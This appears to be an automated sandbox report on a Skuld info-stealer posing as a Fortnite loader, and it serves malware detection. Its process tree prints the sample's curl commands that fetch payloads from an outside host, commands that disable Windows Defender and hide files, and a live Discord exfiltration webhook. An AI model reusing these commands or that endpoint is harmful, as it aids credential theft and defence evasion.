skuld | d684f65afeaf36f09228552a6a3c76c53ac2e9affb10dded7c8727656ad71ed3

Analysis

max time kernel
150s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
07-07-2024 14:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Astro Fortnite Free Loader.exe
Size

14.4MB
MD5

c284115e08a73e4efd15e6e5cb3ca43e
SHA1

f054f448b26d0d771ad46221790dd7f4930cc428
SHA256

d684f65afeaf36f09228552a6a3c76c53ac2e9affb10dded7c8727656ad71ed3
SHA512

92713ba56f8343e74789ff37dbbede91cb778d76e637e34af884a579d7aa0667fdc4aa2af4a2e2d3b3dbb90f700e1be76966402a8605378db7637719d903fc0e
SSDEEP

393216:16wSPvI+HcfkP/K6gwoUTJtiY7o+WwIXh:16zPvXcfcy6g0TDPxMXh

Score

10^/10

skuld execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1259501803045654570/75nMDUd8tUBH4dq2un2_u7hedzL05JWneGIa2IxO45f9rRusN_24AXMRtGoy_ae99OCb

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4044	powershell.exe
4844	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Update.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation	Astro Fortnite Free Loader.exe

Executes dropped EXE 2 IoCs

pid	Process
3684	physmeme.exe
112	Update.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	Update.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
35	discord.com
37	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	api.ipify.org
30	api.ipify.org
32	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	Update.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	Update.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3684 set thread context of 2728	3684	physmeme.exe	95

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Speech\Update.exe	curl.exe
File opened for modification	C:\Windows\Speech\Update.exe	attrib.exe
File created	C:\Windows\Speech\physmeme.exe	curl.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2236	3684	WerFault.exe	92

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4012	wmic.exe
3628	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	33	Go-http-client/1.1

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1368000000010000000800000000409120d035d9017e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	Update.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Update.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Update.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Update.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
440	Astro Fortnite Free Loader.exe
440	Astro Fortnite Free Loader.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
4844	powershell.exe
4844	powershell.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
4536	powershell.exe
112	Update.exe
112	Update.exe
4536	powershell.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe
112	Update.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2728	RegAsm.exe
Token: SeBackupPrivilege	2728	RegAsm.exe
Token: SeSecurityPrivilege	2728	RegAsm.exe
Token: SeSecurityPrivilege	2728	RegAsm.exe
Token: SeSecurityPrivilege	2728	RegAsm.exe
Token: SeSecurityPrivilege	2728	RegAsm.exe
Token: SeDebugPrivilege	112	Update.exe
Token: SeIncreaseQuotaPrivilege	1976	wmic.exe
Token: SeSecurityPrivilege	1976	wmic.exe
Token: SeTakeOwnershipPrivilege	1976	wmic.exe
Token: SeLoadDriverPrivilege	1976	wmic.exe
Token: SeSystemProfilePrivilege	1976	wmic.exe
Token: SeSystemtimePrivilege	1976	wmic.exe
Token: SeProfSingleProcessPrivilege	1976	wmic.exe
Token: SeIncBasePriorityPrivilege	1976	wmic.exe
Token: SeCreatePagefilePrivilege	1976	wmic.exe
Token: SeBackupPrivilege	1976	wmic.exe
Token: SeRestorePrivilege	1976	wmic.exe
Token: SeShutdownPrivilege	1976	wmic.exe
Token: SeDebugPrivilege	1976	wmic.exe
Token: SeSystemEnvironmentPrivilege	1976	wmic.exe
Token: SeRemoteShutdownPrivilege	1976	wmic.exe
Token: SeUndockPrivilege	1976	wmic.exe
Token: SeManageVolumePrivilege	1976	wmic.exe
Token: 33	1976	wmic.exe
Token: 34	1976	wmic.exe
Token: 35	1976	wmic.exe
Token: 36	1976	wmic.exe
Token: SeIncreaseQuotaPrivilege	1976	wmic.exe
Token: SeSecurityPrivilege	1976	wmic.exe
Token: SeTakeOwnershipPrivilege	1976	wmic.exe
Token: SeLoadDriverPrivilege	1976	wmic.exe
Token: SeSystemProfilePrivilege	1976	wmic.exe
Token: SeSystemtimePrivilege	1976	wmic.exe
Token: SeProfSingleProcessPrivilege	1976	wmic.exe
Token: SeIncBasePriorityPrivilege	1976	wmic.exe
Token: SeCreatePagefilePrivilege	1976	wmic.exe
Token: SeBackupPrivilege	1976	wmic.exe
Token: SeRestorePrivilege	1976	wmic.exe
Token: SeShutdownPrivilege	1976	wmic.exe
Token: SeDebugPrivilege	1976	wmic.exe
Token: SeSystemEnvironmentPrivilege	1976	wmic.exe
Token: SeRemoteShutdownPrivilege	1976	wmic.exe
Token: SeUndockPrivilege	1976	wmic.exe
Token: SeManageVolumePrivilege	1976	wmic.exe
Token: 33	1976	wmic.exe
Token: 34	1976	wmic.exe
Token: 35	1976	wmic.exe
Token: 36	1976	wmic.exe
Token: SeIncreaseQuotaPrivilege	4012	wmic.exe
Token: SeSecurityPrivilege	4012	wmic.exe
Token: SeTakeOwnershipPrivilege	4012	wmic.exe
Token: SeLoadDriverPrivilege	4012	wmic.exe
Token: SeSystemProfilePrivilege	4012	wmic.exe
Token: SeSystemtimePrivilege	4012	wmic.exe
Token: SeProfSingleProcessPrivilege	4012	wmic.exe
Token: SeIncBasePriorityPrivilege	4012	wmic.exe
Token: SeCreatePagefilePrivilege	4012	wmic.exe
Token: SeBackupPrivilege	4012	wmic.exe
Token: SeRestorePrivilege	4012	wmic.exe
Token: SeShutdownPrivilege	4012	wmic.exe
Token: SeDebugPrivilege	4012	wmic.exe
Token: SeSystemEnvironmentPrivilege	4012	wmic.exe
Token: SeRemoteShutdownPrivilege	4012	wmic.exe

Suspicious use of WriteProcessMemory 61 IoCs

description	pid	Process	procid_target
PID 440 wrote to memory of 4912	440	Astro Fortnite Free Loader.exe	86
PID 440 wrote to memory of 4912	440	Astro Fortnite Free Loader.exe	86
PID 440 wrote to memory of 744	440	Astro Fortnite Free Loader.exe	87
PID 440 wrote to memory of 744	440	Astro Fortnite Free Loader.exe	87
PID 4912 wrote to memory of 3128	4912	cmd.exe	88
PID 4912 wrote to memory of 3128	4912	cmd.exe	88
PID 4912 wrote to memory of 2780	4912	cmd.exe	89
PID 4912 wrote to memory of 2780	4912	cmd.exe	89
PID 4912 wrote to memory of 1168	4912	cmd.exe	90
PID 4912 wrote to memory of 1168	4912	cmd.exe	90
PID 744 wrote to memory of 3556	744	cmd.exe	91
PID 744 wrote to memory of 3556	744	cmd.exe	91
PID 440 wrote to memory of 3684	440	Astro Fortnite Free Loader.exe	92
PID 440 wrote to memory of 3684	440	Astro Fortnite Free Loader.exe	92
PID 440 wrote to memory of 3684	440	Astro Fortnite Free Loader.exe	92
PID 440 wrote to memory of 1268	440	Astro Fortnite Free Loader.exe	93
PID 440 wrote to memory of 1268	440	Astro Fortnite Free Loader.exe	93
PID 1268 wrote to memory of 1136	1268	cmd.exe	94
PID 1268 wrote to memory of 1136	1268	cmd.exe	94
PID 3684 wrote to memory of 2728	3684	physmeme.exe	95
PID 3684 wrote to memory of 2728	3684	physmeme.exe	95
PID 3684 wrote to memory of 2728	3684	physmeme.exe	95
PID 3684 wrote to memory of 2728	3684	physmeme.exe	95
PID 3684 wrote to memory of 2728	3684	physmeme.exe	95
PID 3684 wrote to memory of 2728	3684	physmeme.exe	95
PID 3684 wrote to memory of 2728	3684	physmeme.exe	95
PID 3684 wrote to memory of 2728	3684	physmeme.exe	95
PID 440 wrote to memory of 112	440	Astro Fortnite Free Loader.exe	100
PID 440 wrote to memory of 112	440	Astro Fortnite Free Loader.exe	100
PID 112 wrote to memory of 1600	112	Update.exe	102
PID 112 wrote to memory of 1600	112	Update.exe	102
PID 112 wrote to memory of 3240	112	Update.exe	103
PID 112 wrote to memory of 3240	112	Update.exe	103
PID 112 wrote to memory of 1976	112	Update.exe	104
PID 112 wrote to memory of 1976	112	Update.exe	104
PID 112 wrote to memory of 4012	112	Update.exe	106
PID 112 wrote to memory of 4012	112	Update.exe	106
PID 112 wrote to memory of 1844	112	Update.exe	107
PID 112 wrote to memory of 1844	112	Update.exe	107
PID 112 wrote to memory of 4844	112	Update.exe	108
PID 112 wrote to memory of 4844	112	Update.exe	108
PID 112 wrote to memory of 4136	112	Update.exe	109
PID 112 wrote to memory of 4136	112	Update.exe	109
PID 112 wrote to memory of 3628	112	Update.exe	110
PID 112 wrote to memory of 3628	112	Update.exe	110
PID 112 wrote to memory of 4536	112	Update.exe	111
PID 112 wrote to memory of 4536	112	Update.exe	111
PID 112 wrote to memory of 2144	112	Update.exe	112
PID 112 wrote to memory of 2144	112	Update.exe	112
PID 112 wrote to memory of 4736	112	Update.exe	113
PID 112 wrote to memory of 4736	112	Update.exe	113
PID 112 wrote to memory of 396	112	Update.exe	114
PID 112 wrote to memory of 396	112	Update.exe	114
PID 112 wrote to memory of 4072	112	Update.exe	115
PID 112 wrote to memory of 4072	112	Update.exe	115
PID 112 wrote to memory of 4044	112	Update.exe	116
PID 112 wrote to memory of 4044	112	Update.exe	116
PID 4044 wrote to memory of 4912	4044	powershell.exe	117
PID 4044 wrote to memory of 4912	4044	powershell.exe	117
PID 4912 wrote to memory of 2928	4912	csc.exe	118
PID 4912 wrote to memory of 2928	4912	csc.exe	118

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1600	attrib.exe
3240	attrib.exe
4736	attrib.exe
396	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Astro Fortnite Free Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Astro Fortnite Free Loader.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Astro Fortnite Free Loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4912
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Astro Fortnite Free Loader.exe" MD5
    3⤵
    PID:3128
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:2780
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:1168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/crypted.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:744
- - C:\Windows\system32\curl.exe
    curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/crypted.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:3556
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3684
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2728
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 308
    3⤵
    - Program crash
    PID:2236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/Update.bin --output C:\Windows\Speech\Update.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1268
- - C:\Windows\system32\curl.exe
    curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/Update.bin --output C:\Windows\Speech\Update.exe
    3⤵
    - Drops file in Windows directory
    PID:1136
- C:\Windows\Speech\Update.exe
  "C:\Windows\Speech\Update.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Adds Run key to start application
  - Maps connected drives based on registry
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:112
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Windows\Speech\Update.exe
    3⤵
    - Drops file in Windows directory
    - Views/modifies file attributes
    PID:1600
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
    3⤵
    - Views/modifies file attributes
    PID:3240
- - C:\Windows\System32\Wbem\wmic.exe
    wmic csproduct get UUID
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1976
- - C:\Windows\System32\Wbem\wmic.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    - Suspicious use of AdjustPrivilegeToken
    PID:4012
- - C:\Windows\System32\Wbem\wmic.exe
    wmic os get Caption
    3⤵
    PID:1844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath C:\Windows\Speech\Update.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4844
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    PID:4136
- - C:\Windows\System32\Wbem\wmic.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    3⤵
